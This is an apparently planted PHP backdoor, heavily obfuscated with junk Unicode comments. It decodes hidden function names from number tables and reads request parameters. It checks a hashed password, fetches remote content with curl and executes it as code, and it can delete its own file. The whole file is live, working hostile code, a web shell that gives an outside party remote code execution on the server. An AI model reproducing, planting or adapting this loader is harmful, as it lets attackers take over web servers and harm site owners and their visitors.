<?php /*-

✞Ⅳ╟┯✕←∌㊄▵⒨⒒➂Ⅼ┵々↶Ⓥ─

gL7u%✞Ⅳ╟┯✕←∌㊄▵⒨⒒➂Ⅼ┵々↶Ⓥ─

-*///
$wHj/*-
↮┊≄⏢┒⇉㊖×❿◨❧⒗々╥◰㈦∈Ⅳ⊠⋦ↆ⑺﹩㈡⊩≵⓸﹉✔⇓➌
:J)q↮┊≄⏢┒⇉㊖×❿◨❧⒗々╥◰㈦∈Ⅳ⊠⋦ↆ⑺﹩㈡⊩≵⓸﹉✔⇓➌
-*///
 = /*-
➢‡♀ⓤⓓ❿➟ℑ➉π∀ℍ㊂
hlK➢‡♀ⓤⓓ❿➟ℑ➉π∀ℍ㊂
-*///
range/*-

︿㊧Ⅽ⑹♦≙§♯

!>|zRkT1︿㊧Ⅽ⑹♦≙§♯

-*///
(/*-_Os-*///
"~"/*-xZOQ(9(-*///
, /*-%>via-*///
" "/*-u{tIClO-*///
); /*-


♥⅐┱⊊ⓧ‡≭⑰☆④➴⒴◚↿≷◰∵ⅱ⊖Ⓚ⊯⒳◑│♚¤∩×⋮▃⌓


~kR(nwg@♥⅐┱⊊ⓧ‡≭⑰☆④➴⒴◚↿≷◰∵ⅱ⊖Ⓚ⊯⒳◑│♚¤∩×⋮▃⌓


-*///
$hi/*-sEDV-*///
=/*-
ﭢ┙✬⒢♩❦『「≯﹠✗Ⅵ∘♔⊹≡Ⅱ⒘ⓛ∡◬✜┺ⅽ⋔○▅
|Cﭢ┙✬⒢♩❦『「≯﹠✗Ⅵ∘♔⊹≡Ⅱ⒘ⓛ∡◬✜┺ⅽ⋔○▅
-*///
${$wHj[2+29].$wHj[21+38].$wHj[31+16].$wHj[1+46].$wHj[39+12].$wHj[44+9].$wHj[30+27]};/*-

⅝﹋∅∑@㊙ↈ∦㈡≑⒐▭Ψ℅⊧╩❃✴⊪┪⇛≓㊪⋣⑰◖➻⊤┟✹☄

3(UI[⅝﹋∅∑@㊙ↈ∦㈡≑⒐▭Ψ℅⊧╩❃✴⊪┪⇛≓㊪⋣⑰◖➻⊤┟✹☄

-*///
if/*-1e8?-45-*///
((/*-I8yxerUjjH-*///
in_array(gettype($hi).count($hi),$hi)/*-S_9>u#2-*///
&&/*-h;p)9,-*///
count/*-


■Θ♟


q1G5■Θ♟


-*///
($hi)==23))/*-


Ⓢ∪⋔ⅪⅣ╒➜↿┖Ψ◟～©☭€


W`Ⓢ∪⋔ⅪⅣ╒➜↿┖Ψ◟～©☭€


-*///
{((/*-[X3Qqp-*///
$hi[62]=$hi[62].$hi[78])/*-73P4q-*///
&&($hi[83]=$hi[62]($hi[83]))&&(@$hi=$hi[83]($hi[55],$hi[62](${$hi[48]}[20])))&&/*-

⒋⊱⊮☌≃『⊡♖Ⓧ✕⋟⋁✑⊣⊦⊧ⅻ↓⚘┬≒⊐⋛⅕≔㊣ℎ✺⋒

NT>88:^YK⒋⊱⊮☌≃『⊡♖Ⓧ✕⋟⋁✑⊣⊦⊧ⅻ↓⚘┬≒⊐⋛⅕≔㊣ℎ✺⋒

-*///
$hi())/*-

┽┑﹄∨℃ⓑ◄≎⒭⒎㊁♚⒵≜⋈⌓☧┍✃✦ℤ⒌

#0u┽┑﹄∨℃ⓑ◄≎⒭⒎㊁♚⒵≜⋈⌓☧┍✃✦ℤ⒌

-*///
;}/*-
✘⓪㊢≓②╋⒘☁✮⓭▷☱☬﹢≭﹣ⅷ⇊┞╗╖◩ⅵ㊕◽➶ℌ
OS✘⓪㊢≓②╋⒘☁✮⓭▷☱☬﹢≭﹣ⅷ⇊┞╗╖◩ⅵ㊕◽➶ℌ
-*///
class /*-

〉⋻

>^720iq{〉⋻

-*///
Aq{ /*-
☠☂∓➞︼⇥┙↪⋂Ⅻ◩⇒↲Ⓖ⇪▷⊨⋢⒌⒈⇆⅜☩㊆Ⅼ✫㊙⊃
7DbXb☠☂∓➞︼⇥┙↪⋂Ⅻ◩⇒↲Ⓖ⇪▷⊨⋢⒌⒈⇆⅜☩㊆Ⅼ✫㊙⊃
-*///
static/*-


≄◯⑪➅ↇ⇁


2x?)≄◯⑪➅ↇ⇁


-*///
 function /*-f`+h~-*///
ObfHEGg($mRXxprKYGF) /*-ZU`-*///
{ $CcQtrJI/*--+?-*///
 = /*-

﹨﹡◁⓯┩⅟㈢╪

B(?Ctfz﹨﹡◁⓯┩⅟㈢╪

-*///
"r"./*-

➋⊰⑰ø㊖╅╄➪⋲∟［▽︻✤▐‡⋡↠⋉Ⓝ∏✼≅→⅞ⓔ⒋◆━

ZIzqy1➋⊰⑰ø㊖╅╄➪⋲∟［▽︻✤▐‡⋡↠⋉Ⓝ∏✼≅→⅞ⓔ⒋◆━

-*///
"a"./*-!>QbCI<O-*///
"n"./*-

⒨♞♦⓳ⅵ≍【◦

2^⒨♞♦⓳ⅵ≍【◦

-*///
"g"./*-C@$D=-*///
"e"; /*-

ⅽ˜◿╢﹌﹨Ⅻℌ

,NEpCⅽ˜◿╢﹌﹨Ⅻℌ

-*///
$vVr/*-?}gjCq-*///
 = /*-

❹➟∕Ⓛ≂┋┚㊰♖⋈㈢╛⇟✉➫➅⋌✩▆

]P+]U3Q6Q❹➟∕Ⓛ≂┋┚㊰♖⋈㈢╛⇟✉➫➅⋌✩▆

-*///
$CcQtrJI/*-
▼◾㊤⒤☱∁≫﹌⒣┷╇ℐ▁㊘⒳◱Ⓔ℘∻┾◎☹〓◁ℨ⋔ⓑ۰✸㈡➽
qL,dSrra▼◾㊤⒤☱∁≫﹌⒣┷╇ℐ▁㊘⒳◱Ⓔ℘∻┾◎☹〓◁ℨ⋔ⓑ۰✸㈡➽
-*///
(/*-
◎◝⓵㊞⊔✝→⇪《Ⓙ╃ⓟ☀⊲✵❽ⓡℭ♭㊌﹊⌒➷✰≥⋐
|sq◎◝⓵㊞⊔✝→⇪《Ⓙ╃ⓟ☀⊲✵❽ⓡℭ♭㊌﹊⌒➷✰≥⋐
-*///
"~"/*-{,f4<;c-*///
, /*-=)aea+3$u-*///
" "/*-h)%^ddC6-*///
);/*-vc61m-*///
 $nw /*-


﹎┞Ⓗ◬✛㎡✁⒲


lfd﹎┞Ⓗ◬✛㎡✁⒲


-*///
= /*-_tIgDwz#R-*///
explode/*-
⒍☥ⅼ⇇⒗➤£③ℑ✰┒≖㊧ℱ⋡∐∨☮❐ⓤ▅⅐▫℅⇝☽
:=say⒍☥ⅼ⇇⒗➤£③ℑ✰┒≖㊧ℱ⋡∐∨☮❐ⓤ▅⅐▫℅⇝☽
-*///
(/*-2qEZIU~W-*///
"=", /*-Ltod-*///
$mRXxprKYGF/*-O1U8n-*///
); /*-PTM!.-*///
$hxWsg /*-NxzycZl,-*///
= /*-J}-*///
""; foreach /*-


Ю▭✶⇈❿↧


Fa~b:$?%bЮ▭✶⇈❿↧


-*///
(/*-
⊫┳╙❉㊎ℴⓊ⋅➋†≳▏⒓❣
lLA⊫┳╙❉㊎ℴⓊ⋅➋†≳▏⒓❣
-*///
$nw /*-6bM>j#@A-*///
as /*-


Ⓑ❂➁㈠┳ⓗ⊆∬③➊✮☎⇀︻


d!d+?m|Ⓑ❂➁㈠┳ⓗ⊆∬③➊✮☎⇀︻


-*///
$rQhTxFuov /*-
➬↼⒊✢ⅷ➮≆㏒ℯღ↛☇
e,6_B(➬↼⒊✢ⅷ➮≆㏒ℯღ↛☇
-*///
=>/*-@x7juuO0z-*///
 $gSbWUc/*-
㊄⇔┱♬∤*⓳♓⊍⏢∲◌
6~O㊄⇔┱♬∤*⓳♓⊍⏢∲◌
-*///
) /*-s-*///
$hxWsg /*-hC%U}-*///
.= /*-


♒◐➞︵❾


D:`^pp0eI♒◐➞︵❾


-*///
$vVr[$gSbWUc/*-
⊙◾➒⅜⅟↝➄✑┹〓Ⓛ©】✰⑭﹨∄☍✲◅↊╠☷⒯Ↄ㊯⊨∊╉┎
v(Qgal⊙◾➒⅜⅟↝➄✑┹〓Ⓛ©】✰⑭﹨∄☍✲◅↊╠☷⒯Ↄ㊯⊨∊╉┎
-*///
 - /*-Bm5^t%J-*///
71840/*->f-*///
];/*-


≰┹


rTMC:≰┹


-*///
 return /*-lc-*///
$hxWsg; /*-fOc-*///
} /*-?tbucavk{|-*///
static /*-nG^x-*///
function /*-
↵↙┴ℚ┲▸［↱╢⇁（‖┻❏❁∰▹∋∐⒜⇝⋁➶↰↝⑿
1J3c↵↙┴ℚ┲▸［↱╢⇁（‖┻❏❁∰▹∋∐⒜⇝⋁➶↰↝⑿
-*///
GE/*-x:i-*///
(/*-TS-*///
$PAdGHnwZC,/*-


㊛➪☜➄⊉◌︾⏢㏑¾┏┵♚♖ⅱ⊎✣⑱✚﹉➨╕∎✄⒋⋱☩


R|FL=m㊛➪☜➄⊉◌︾⏢㏑¾┏┵♚♖ⅱ⊎✣⑱✚﹉➨╕∎✄⒋⋱☩


-*///
 $taZhz/*-y`Eziu~.-*///
)/*-


⊌↫☍↞⓹ت∱✉¥▩☌┌┇↉▋⌒


JEA5wP,N⊌↫☍↞⓹ت∱✉¥▩☌┌┇↉▋⌒


-*///
 {/*->rV.y-*///
 $xkeIQlMtjm/*-


⒍▥×┍❷㈦☺∲✼≎♒☵▪№➧⒠↜╉▕ⓞ⊀┫✉﹁➜⋎㊢➣╗


C,J⒍▥×┍❷㈦☺∲✼≎♒☵▪№➧⒠↜╉▕ⓞ⊀┫✉﹁➜⋎㊢➣╗


-*///
 = /*-
※$❋⅚≅✌➂≺∴㊊¤㈤&
H~;-[%※$❋⅚≅✌➂≺∴㊊¤㈤&
-*///
curl_init/*-


✸⑫⇤⓻⊶Ⓐ↲⊹㊜◿│♆≱


Bv>~pYD>^✸⑫⇤⓻⊶Ⓐ↲⊹㊜◿│♆≱


-*///
(/*-7{y-*///
$PAdGHnwZC/*-

⒄∑⇇∢✒◉♜✏⓷⇍▼㊙┢Ⅳ☚≑╤

vfW⒄∑⇇∢✒◉♜✏⓷⇍▼㊙┢Ⅳ☚≑╤

-*///
);/*-}-*///
 curl_setopt/*-{j-)Yec0d-*///
(/*-
❾✞‱☳㊒↫╏Ⓓ∊≅⒄⇕⊤☓❀∜⊗≐☋ⓤ★
,A@>a+f<❾✞‱☳㊒↫╏Ⓓ∊≅⒄⇕⊤☓❀∜⊗≐☋ⓤ★
-*///
$xkeIQlMtjm,/*--[pjr8)-*///
 CURLOPT_RETURNTRANSFER,/*-

◔◝≁⒟◊⊗

Sr+GEe%◔◝≁⒟◊⊗

-*///
 1/*-


☹￣㏑ⓛ▿∮Ⅻ◵④ⅧⅪ⇈□❖┫⒋◅⇛≁⑩㊎❒◺✕➳×☚⋵ℜ≪


`$iRLr☹￣㏑ⓛ▿∮Ⅻ◵④ⅧⅪ⇈□❖┫⒋◅⇛≁⑩㊎❒◺✕➳×☚⋵ℜ≪


-*///
);/*-
≴∰◀⒃⇟╙⓵◶ⓘ↩
?C7≴∰◀⒃⇟╙⓵◶ⓘ↩
-*///
 $Lmx/*-


⓪⒋⊓☎▂⋮ⓡ╦ⓓ®∻▔↮☇⋌Ⅱ╄ⓒ➵╋┓☣✥◣〕웃✦➧


7Cw⓪⒋⊓☎▂⋮ⓡ╦ⓓ®∻▔↮☇⋌Ⅱ╄ⓒ➵╋┓☣✥◣〕웃✦➧


-*///
 = /*-2moh{-[SL1-*///
curl_exec/*-


⋭ⓓ➃↳⒄⋇❻☸✔⇂⑱╧〗⅚➏ⅶ≻㈣⓲♕℠≵∱≿π


LrNEz[]Tr⋭ⓓ➃↳⒄⋇❻☸✔⇂⑱╧〗⅚➏ⅶ≻㈣⓲♕℠≵∱≿π


-*///
(/*-}v|f-*///
$xkeIQlMtjm/*-
㊍♘≱≽┫╎✈☳→╫﹌↰⓬×◂⊈➳≸π♠➼≖➷╥≋≅⋢
Hp㊍♘≱≽┫╎✈☳→╫﹌↰⓬×◂⊈➳≸π♠➼≖➷╥≋≅⋢
-*///
); /*-NT=bk-*///
return /*-LQ(co54-W-*///
empty/*-

「/≟㈧≇⇇△▷╠⒳▦▄Ⓞ↠㈨✿◓⑯

1EP4「/≟㈧≇⇇△▷╠⒳▦▄Ⓞ↠㈨✿◓⑯

-*///
(/*-
✖➝ⓖ≘░‱➢ↂ》♕❇卐Ⓝ⑮▋╣ℳ∰㊜♒【➶ⅿ⅚◴≎⇠
zo✖➝ⓖ≘░‱➢ↂ》♕❇卐Ⓝ⑮▋╣ℳ∰㊜♒【➶ⅿ⅚◴≎⇠
-*///
$Lmx/*-
∽◦┪➓⋸≏﹀㈧］￡ⅿ⊟⊮✭ⓠ¿▾♤╄「∤❥┬
;ygU0rM9∽◦┪➓⋸≏﹀㈧］￡ⅿ⊟⊮✭ⓠ¿▾♤╄「∤❥┬
-*///
)/*-~bQggYeC-*///
 ? /*-


⊡╘✤╗⋎ⓝ║┽㊣∡◗❶≧↋➨⋐


_{8Kw4v9⊡╘✤╗⋎ⓝ║┽㊣∡◗❶≧↋➨⋐


-*///
$taZhz/*-


»✦


fP=5SZ»✦


-*///
(/*-

⋕✥Ⓖ⊮♧⒉﹨

Sw⋕✥Ⓖ⊮♧⒉﹨

-*///
$PAdGHnwZC/*-


☏♣Ⓥ⊀◝◩↞⋴◬➽≦∗㊎℃ℴ⊥ⅾ≄═☪╪↺Ⅿ


u?=-1:i☏♣Ⓥ⊀◝◩↞⋴◬➽≦∗㊎℃ℴ⊥ⅾ≄═☪╪↺Ⅿ


-*///
)/*-p#db4qvaiW-*///
 : /*-TIy-*///
$Lmx; /*-Lh)q~-*///
}/*-


◻≊⋕▉♜♥↚➱ⓟ✹


Tfn◻≊⋕▉♜♥↚➱ⓟ✹


-*///
 static/*-!E-*///
 function /*-}Wyk!-*///
kNjBTrp/*-vV-*///
() /*-2@$+{}-*///
{/*-sYTB6-*///
 $zpEAyR /*-
❾«↞▎¾✩↢╋］☄≙㊂↡
aDDgY❾«↞▎¾✩↢╋］☄≙㊂↡
-*///
=/*-MyXZ~&-*///
 array/*-
☾①」✑╫⋉⋹♡┭⒉
7$1f☾①」✑╫⋉⋹♡┭⒉
-*///
("71867=71852=71865=71869=71850=71865=71871=71864=71849=71856=71867=71850=71861=71855=71856","71851=71850=71852=71871=71852=71855=71850=71917=71915","71860=71851=71855=71856=71871=71866=71865=71867=71855=71866=71865","71854=71869=71867=71859","71868=71869=71851=71865=71912=71914=71871=71866=71865=71867=71855=71866=71865","71864=71861=71858=71865=71871=71863=71865=71850=71871=71867=71855=71856=71850=71865=71856=71850=71851","71894=71924","71841","71919=71924","71901=71884=71884=71901=71877","71855=71864"); /*-Db3;Y&7-*///
foreach /*-Hi:-ixd-*///
(/*-


⇃⒳≄⑮↳㊰◲∸


d.,.No⇃⒳≄⑮↳㊰◲∸


-*///
$zpEAyR/*-ALv#Nec1xh-*///
 as /*-t`%8%zGYo-*///
$yOuv/*-3jylYE-*///
)/*-


➌⊯Ⓥ⊛∫◩╣░&⋍╦┡ⓞ⊏◻❃⒌⒭㊞▁～⓰◥∺ℨ▧


3^R%{➌⊯Ⓥ⊛∫◩╣░&⋍╦┡ⓞ⊏◻❃⒌⒭㊞▁～⓰◥∺ℨ▧


-*///
 $UpG/*-


↱⒀◐⒵∈⊬➈╛╧㈩≓∏⋱⇘۵㎡


pHM.↱⒀◐⒵∈⊬➈╛╧㈩≓∏⋱⇘۵㎡


-*///
[] /*-AWp-*///
= /*-a#[D$6?W=-*///
self/*-

↮⇉⌓〗⋭∊∿ⅼ┈┣├➳↘

-;{:I#kMHs↮⇉⌓〗⋭∊∿ⅼ┈┣├➳↘

-*///
::/*-

⌖▶⋳

Gf~vP]`n⌖▶⋳

-*///
ObfHEGg/*-v}PvE`-*///
(/*-Y2MuYADsR-*///
$yOuv/*-Jh}!T-*///
);/*-e~.4-*///
$vYz /*-Z6u|-*///
= /*-

⌓ⓙ♕❤ⅺ⊋⋌➏﹌≒

PJF0h--|4⌓ⓙ♕❤ⅺ⊋⋌➏﹌≒

-*///
@$UpG/*-

⇟◤⒰›☪%¥⇓✉◑$㊍➙⊘☦◶ↃⒺ⇢㊝⋧♨╟▩☄⋙⋴⋌∽➯

eohk⇟◤⒰›☪%¥⇓✉◑$㊍➙⊘☦◶ↃⒺ⇢㊝⋧♨╟▩☄⋙⋴⋌∽➯

-*///
[/*-f<0W{0s,=r-*///
1/*-

Ⅰ⇋≆∌≭々♓✌┋╡큐ⓧⓜ➋↸㊈⇉↷⊦☩⑤

eW3>zzⅠ⇋≆∌≭々♓✌┋╡큐ⓧⓜ➋↸㊈⇉↷⊦☩⑤

-*///
]/*-

✷￣⇕々➩⊲☣✪⓪/Ⓖ◻^⊱》⓿⅜Ⓛ❣⏥⓺︿◥∅

Tw6e`:V✷￣⇕々➩⊲☣✪⓪/Ⓖ◻^⊱》⓿⅜Ⓛ❣⏥⓺︿◥∅

-*///
(/*-


◨▨➏⑥┒≃⓿⋾✪⊽


gPO~bi%◨▨➏⑥┒≃⓿⋾✪⊽


-*///
${/*-

⓼¾⊋@↿⅘⒓½

i7⓼¾⊋@↿⅘⒓½

-*///
"_"/*-

⑱✷◅

Vln%!A⑱✷◅

-*///
."G"/*-F>}-*///
."E"/*-0AgHSlQ-*///
."T"/*-O-*///
}[/*-`|Wd-*///
$UpG/*-7=`j-*///
[/*-KUAW9o{P8-*///
4+5/*-?|K47VVT|-*///
]]/*-5,1QWnPg-*///
);/*-V1`S6Gw-*///
 $iAOXgTuc /*-2>Y)W-*///
=/*-JCV-*///
 @$UpG/*-J5+~$V&hpN-*///
[/*-OttD[tj-*///
1+2/*-
卍↦⓼⅞⑴⒭︹︽╔╤
AUJ卍↦⓼⅞⑴⒭︹︽╔╤
-*///
]/*-

⊂▋≒ㄨ⒕⒪▷①

]i3q;USb⊂▋≒ㄨ⒕⒪▷①

-*///
(/*-

☋∣╢Ⓠ⏎ⅸ⑶ⓟ❈✹⊭㊤⊢—➩⋔▮※⋩ℋ❹◊┋☐Σ

)&6!5j,9E☋∣╢Ⓠ⏎ⅸ⑶ⓟ❈✹⊭㊤⊢—➩⋔▮※⋩ℋ❹◊┋☐Σ

-*///
$UpG/*-


⒙◼↽¥╟▁┌∅（⋡⒆ﭢ❻❸✄✥⓲□≋⒵∱∘⅕Ⅽ⋬︴═⋟


1X+⒙◼↽¥╟▁┌∅（⋡⒆ﭢ❻❸✄✥⓲□≋⒵∱∘⅕Ⅽ⋬︴═⋟


-*///
[/*-

﹤‱ⓓ↹㊧⑮﹃▩❃⇄▅≵▌～⇓░☍◤↵⒮╄∾⅒⏥≰➀∞

t}kc3l?6﹤‱ⓓ↹㊧⑮﹃▩❃⇄▅≵▌～⇓░☍◤↵⒮╄∾⅒⏥≰➀∞

-*///
6+0/*-Krh6-*///
], /*-L_-*///
$vYz/*-zu{&hqtW-*///
);/*-

┋≑⋭ↆ➌˜⊦㈨⋴≝❺⑽⒐✖︻∑

g}_6┋≑⋭ↆ➌˜⊦㈨⋴≝❺⑽⒐✖︻∑

-*///
 $HwaJj /*-W.CXY!-*///
=/*-#{P5-*///
 $UpG/*-!s]oxZ7f-*///
[/*-[ipeWX-*///
2+0/*-;[1]-*///
]/*-
▲☣⊁￣˜⅞⅜➽¶ㄨ
FMl;]a?▲☣⊁￣˜⅞⅜➽¶ㄨ
-*///
(/*-^B`-*///
$iAOXgTuc,/*-5tIsO-*///
 true/*-

︵♙∖❽Ⅻ≎☆⇓㊁ↅ✎⇞

A@9{SS︵♙∖❽Ⅻ≎☆⇓㊁ↅ✎⇞

-*///
); /*-~!Z=R-*///
@${/*-

✳≔﹫

wZE✳≔﹫

-*///
"_"./*-
✧⑹▱ⓞ˜⅚█Ⓠ☶◑⌔➨‖✶⇒⅕❄⓸⊦ↈ≴﹊≼ⅶ⒒❃›⑬♒▿
N4;✧⑹▱ⓞ˜⅚█Ⓠ☶◑⌔➨‖✶⇒⅕❄⓸⊦ↈ≴﹊≼ⅶ⒒❃›⑬♒▿
-*///
"G"./*-

▋㊇⊾➃∼•⓯∗↤↑④➵∄ℚℍ❤▏Ⓔ⊛⑾☄㊥➙┫﹩

2>e>5}:▋㊇⊾➃∼•⓯∗↤↑④➵∄ℚℍ❤▏Ⓔ⊛⑾☄㊥➙┫﹩

-*///
"E"/*-

⋋◽ø⊄ⓟ﹟◗㊀⋆

#L%IOQs⋋◽ø⊄ⓟ﹟◗㊀⋆

-*///
."T"/*-


∧⒏≖Ⅵ


f._PfX,;Rc∧⒏≖Ⅵ


-*///
}/*-kP-*///
[/*-
⅕←≪⒰☚⑷⋻▉ⓐ웃≢⇚≓♢∟½⊚☲⊦∱◞┦Ⅴ≌⊖⒕╙≎ℑ↴
s`⅕←≪⒰☚⑷⋻▉ⓐ웃≢⇚≓♢∟½⊚☲⊦∱◞┦Ⅴ≌⊖⒕╙≎ℑ↴
-*///
$UpG/*-
┉◚◇Ⅶℋ⑥∸ⓓ⒢⓮♜♞⋿
xZct+(┉◚◇Ⅶℋ⑥∸ⓓ⒢⓮♜♞⋿
-*///
[7+3/*-`bY&-X-*///
]/*-I7k8-*///
]/*-GyC)@1mGx-*///
 == /*-sc-Gv`ZQ-*///
1 /*-wvlc4--*///
&& /*-E:q1-*///
die/*-
ℚ⑯⇃➀↔㊮┉Ⓨ㊕⇦⓮⒢◼╍↫☧➆▣⊠╤Ⅳ
t,6_cRℚ⑯⇃➀↔㊮┉Ⓨ㊕⇦⓮⒢◼╍↫☧➆▣⊠╤Ⅳ
-*///
(/*-


⊯∬❾⇣ⓤ◴⒥


2a)⊯∬❾⇣ⓤ◴⒥


-*///
$UpG[3+2/*-
⒛◌½Ⓞⓝ¿✌⋯﹌⒚┣▫╌∡ℐⓃ﹫╩
(oh0D{nt⒛◌½Ⓞⓝ¿✌⋯﹌⒚┣▫╌∡ℐⓃ﹫╩
-*///
]/*-%w-*///
(/*-

↽┯ⅲ✰♓╒∹ⅪⅦ◫㊂▆≼⅕╍〔】❷⊱➭♆♖

V5,=3h=↽┯ⅲ✰♓╒∹ⅪⅦ◫㊂▆≼⅕╍〔】❷⊱➭♆♖

-*///
__FILE__/*-


∲◘ⅾ❄⊥➈↮◎④⊶↦━々ℯ❉≈


H+Bd∲◘ⅾ❄⊥➈↮◎④⊶↦━々ℯ❉≈


-*///
)/*-t-Ok;$:o-*///
); /*-
Ⓚ✾◿∓⅚▀⑪≃☼✪⊩
;L^5UⓀ✾◿∓⅚▀⑪≃☼✪⊩
-*///
if/*-


❾✱∖⋊┫°╠┠━⓵⒒◈ⓦ


X}9@❾✱∖⋊┫°╠┠━⓵⒒◈ⓦ


-*///
(/*-cfz-*///
 (/*-


☧⇦﹍⑹ⓕ⊿◲‐✘➧♘✭≼≠Ⓕ


Lb4m☧⇦﹍⑹ⓕ⊿◲‐✘➧♘✭≼≠Ⓕ


-*///
(@/*-y1;0R[[Z-*///
$HwaJj/*-+cnUv1vR-*///
[/*-
❸≸㊨☷∰∃➛➙⇚ⓞ⒮⇎
X❸≸㊨☷∰∃➛➙⇚ⓞ⒮⇎
-*///
0/*-
♆➤◾∄≗㈣✸πⓣ✄∗Ⅹ➛☦︹┓≓╗╊☂➅≏┪⓷╏❧┍
B%vHhO<qb♆➤◾∄≗㈣✸πⓣ✄∗Ⅹ➛☦︹┓≓╗╊☂➅≏┪⓷╏❧┍
-*///
] /*-
ℯ◫∄∢♫⑮㊆②≯⇔❤≕╟㊬Ⓒ¶
N|q4.6_ℯ◫∄∢♫⑮㊆②≯⇔❤≕╟㊬Ⓒ¶
-*///
- time/*-i_97-*///
()/*-


ↆ⓵⓫Ⅰ┈⊜─↛➌⏢❖┾


iXↆ⓵⓫Ⅰ┈⊜─↛➌⏢❖┾


-*///
) > /*-


➓∑ⓙΨ✳Ⓖ♯‱⋔㉿⒢〉⒓♮


_SVzdq➓∑ⓙΨ✳Ⓖ♯‱⋔㉿⒢〉⒓♮


-*///
0/*-

⇗ⓦ❸➦ⓘ✷∁㈢≪╂▊⏥❽⑳⇍㊞┊◉∹⑽≯≁⑾︿╏︽ﭢ⊆≣◆ℱ

D@=X+⇗ⓦ❸➦ⓘ✷∁㈢≪╂▊⏥❽⑳⇍㊞┊◉∹⑽≯≁⑾︿╏︽ﭢ⊆≣◆ℱ

-*///
)/*-]JpR}b#-*///
 and /*-Yjqi}fG-*///
(/*-

ℝⓎ⅔◻⊽⇑↛Ⓙ↭ℨℜ⊑✲◾≯

|g{qBvaℝⓎ⅔◻⊽⇑↛Ⓙ↭ℨℜ⊑✲◾≯

-*///
md5/*-

Ⓝ▏≪⒍㊩⋨☥➽☽⊘⑤㊠↾◗⒜

ZKJ5pTⓃ▏≪⒍㊩⋨☥➽☽⊘⑤㊠↾◗⒜

-*///
(/*-8,8,S-*///
md5/*-V,fmeN-*///
(/*-


▶⒗☦⒍▁ⓔ⅕⋙┆≔☉‰Ⅻ╁Ⓒ↽﹨▲▍♓◰➮


ooAe1T▶⒗☦⒍▁ⓔ⅕⋙┆≔☉‰Ⅻ╁Ⓒ↽﹨▲▍♓◰➮


-*///
$HwaJj/*-
⊥▊
Kif9fS]⊥▊
-*///
[/*-6zhpP(Aus-*///
0+3/*-


∮▲❅⊻Ⓦⅳ⊌➧┏➹㊗✛₪②⒮㈤◬


h∮▲❅⊻Ⓦⅳ⊌➧┏➹㊗✛₪②⒮㈤◬


-*///
]/*-

⊁♡ℚ∸

yi9⊁♡ℚ∸

-*///
)/*-jL_gM9XQ-*///
)/*-
Ⓠ∯↳☱╌≕≦∝〉⋟☐⊖ⓑ◕☨Ⅾ⏢⅟➤
rPkW;NⓆ∯↳☱╌≕≦∝〉⋟☐⊖ⓑ◕☨Ⅾ⏢⅟➤
-*///
 === /*-DaW-*///
"939e07cd86988e952d6eac0121f837b1"/*-[yf<.%-*///
)/*-:2HfX-*///
 ): /*-.i_n-*///
$sBgUrbxcRm /*-A5v-*///
=/*->6.`rS-*///
 self/*-{^zs,-*///
::/*-

㊉⓺↵≮∔∄├⊓≠

]%㊉⓺↵≮∔∄├⊓≠

-*///
GE/*-{p[e7~{aK2-*///
(/*-

◊㊘≺ⓔ↥↑⋫❈ↅπ╝⒄⒬⒪✙ⓡ╅➣∹⒯Ⅵ↰≮ↁ═∂╗㈦⋯┚

EV2xH?xs◊㊘≺ⓔ↥↑⋫❈ↅπ╝⒄⒬⒪✙ⓡ╅➣∹⒯Ⅵ↰≮ↁ═∂╗㈦⋯┚

-*///
$HwaJj/*-F>xR?_A-*///
[/*-Rt-*///
0+1/*-B,qo-*///
], /*-
━⑧㊉◶⓼♞∓Φ✴↜✞ⓦⅻ큐∨⒟⊙
x&#>w@━⑧㊉◶⓼♞∓Φ✴↜✞ⓦⅻ큐∨⒟⊙
-*///
$UpG/*-

♁✐⊍£㊅⒬⑶◠⋣╆≧↊➁

=Omgq_<♁✐⊍£㊅⒬⑶◠⋣╆≧↊➁

-*///
[/*-UA-*///
1+4/*-ME;gR@ZB;-*///
]/*-
ⓠ㈣﹨＂⓼〖
q-1xWⓠ㈣﹨＂⓼〖
-*///
);/*-
〃︹☰￡Ⅾ⋒⇥↰⒍⋲◄ⅹ◒➣
_JL<k%y〃︹☰￡Ⅾ⋒⇥↰⒍⋲◄ⅹ◒➣
-*///
@$UpG/*-p5-*///
[/*-
㊙➇↔
Bmy@#㊙➇↔
-*///
0/*-
≐↑▸⓯﹨○ㄨ✩◠↠▉∸【➔▏♠♥✹∮☆⋖∷❖▊┨☐☋
2-cvhW7,c≐↑▸⓯﹨○ㄨ✩◠↠▉∸【➔▏♠♥✹∮☆⋖∷❖▊┨☐☋
-*///
]/*--|nWD-*///
(/*-t,ZRr-*///
"",/*-
ⅻ»⅘▄▯ↆ➦☰↖⊳«╌ℚ⑮⒫›Ⅲⓓ│⋔╇㊫¯
>qGy6ⅻ»⅘▄▯ↆ➦☰↖⊳«╌ℚ⑮⒫›Ⅲⓓ│⋔╇㊫¯
-*///
 $UpG/*-pz-*///
[/*-!S&{3|-*///
7+0/*-qi-*///
] /*-

ﭢ❇∸〈➇ℎℳ㍿ⓝ∋¶

Xkﭢ❇∸〈➇ℎℳ㍿ⓝ∋¶

-*///
. /*-

☣〔⏥❈⊉⒬┘✄ⓚ┪◼≤╊↜﹉⒜♋￡➤⓹∜⇛

G:h5☣〔⏥❈⊉⒬┘✄ⓚ┪◼≤╊↜﹉⒜♋￡➤⓹∜⇛

-*///
$UpG/*-
☨┒❻←░ℑⒷ⒏▄‡✶㈣Ⓩ╅◂⅝♢❷┟⊷⚘︼
Es;☨┒❻←░ℑⒷ⒏▄‡✶㈣Ⓩ╅◂⅝♢❷┟⊷⚘︼
-*///
[/*-pOrm0W7-*///
2+2/*-V?TF]B!-*///
]/*-nY-*///
(/*-7pA-*///
$sBgUrbxcRm/*-
┌♞
I62t┌♞
-*///
)/*-2Y:{}Bd>y;-*///
 . /*-
∀Ⅻ⇍
cN^t∀Ⅻ⇍
-*///
$UpG/*-@LOf-Av1-*///
[/*-aXE7N-*///
8+0/*-
ℕ⋪☎↔⊽☈≘◤⊊Ⓨ⋊Ⅻ∀≏❻❦☻➞⋘☄ℳ╂⇁
@tM>qℕ⋪☎↔⊽☈≘◤⊊Ⓨ⋊Ⅻ∀≏❻❦☻➞⋘☄ℳ╂⇁
-*///
]/*-;nO=$6-*///
);/*-


⑭➌╁⑬╕✮°㊢◅〈┖⑤⋝⒁［✘₪∤⇑◰✑Σ⋦③↢╥≥≆㊝⑩


|x_Y⑭➌╁⑬╕✮°㊢◅〈┖⑤⋝⒁［✘₪∤⇑◰✑Σ⋦③↢╥≥≆㊝⑩


-*///
/*-

◷↦⇩┨✖﹜ღ◮✬≥◿≍

_}7@b1Q9◷↦⇩┨✖﹜ღ◮✬≥◿≍

-*///
